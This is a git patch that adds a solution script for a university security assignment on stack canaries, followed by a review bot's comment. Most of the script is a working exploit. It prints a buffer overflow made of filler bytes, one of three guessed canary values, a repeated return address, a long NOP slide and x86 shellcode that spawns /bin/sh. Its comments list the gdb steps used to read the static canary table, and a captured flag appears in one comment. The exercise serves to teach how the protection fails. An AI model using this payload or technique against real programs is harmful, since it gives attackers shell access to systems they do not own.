From 731478bcdf4ffc61944aeff10197684560bc705c Mon Sep 17 00:00:00 2001
From: Sascha Tommasone
Date: Sun, 23 Jun 2024 23:04:14 +0200
Subject: [PATCH] [Assignment-6] solution task 7 (stack canaries)
---
.../fake_canary/solution.sh | 41 +++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100755 Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh
diff --git a/Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh b/Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh
new file mode 100755
index 0000000..704a065
--- /dev/null
+++ b/Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh
@@ -0,0 +1,41 @@
+#!/bin/bash
+
+# flag{CANARY_IS_ALSO_AN_ISLAND}
+
+##### Exploit Creation Steps #####
+# Step 1: Locate address of 'int stack_canaries [10]' using gdb
+# Command: disas owerflow
+# -> 0x56559020
+##################################
+# Step 2: Print all 10 possible stack canaries in gdb
+# Command: x/10xw 0x56559020
+##################################
+# Step 3: Select only those canaries that do not contain a null byte
+##################################
+# Step 4: Combine Slide Rider with the selected stack canaries
+##################################
+
+############ Exploit ##############
+# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
+# Note: Only canaries without null bytes can be used due to the use of strcpy.
+case $(( RANDOM % 3 )) in
+ 0)
+ printf "AAAAAAAAAAAAAAAA\xa9\x67\xa3\x70"
+ ;;
+ 1)
+ printf "AAAAAAAAAAAAAAAA\xc1\xd1\xce\x4b"
+ ;;
+ 2)
+ printf "AAAAAAAAAAAAAAAA\x0e\x8b\xba\x08"
+ ;;
+esac
+
+# Step 2: Fill the buffer with a candidate return address
+printf "\x10\xd6\xff\xff%.0s" {1..30}
+
+# Step 3: Write a lot of NOPs to stdout as a slide for the shellcode
+printf "\x90%.0s" {1..2000}
+
+# Step 4: Write the provided shellcode to stdout
+printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
+###################################
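Review bot: The comment block explains how the payload is assembled but never names the weakness being demonstrated, which is what a reader of an assignment solution needs most: going by Steps 1–3 and the `strcpy` note, the canary comes from a fixed ten-entry table in the binary (`stack_canaries`) rather than a per-process secret, and the copy has no bound. I would add a header comment such as `# Root cause: canary is taken from a static table readable in the binary; strcpy() copies without a length check.` followed by `# Fix: per-process random canary that contains a NUL byte, bounded copy, non-executable stack.` The fixed address in creation Step 1 and the return-address bytes in exploit Step 2 presumably hold only for one build with address randomisation off, so that assumption is worth stating next to them. Separately, the `# flag{...}` line commits the captured flag to the repository; confirm that is intended for this course.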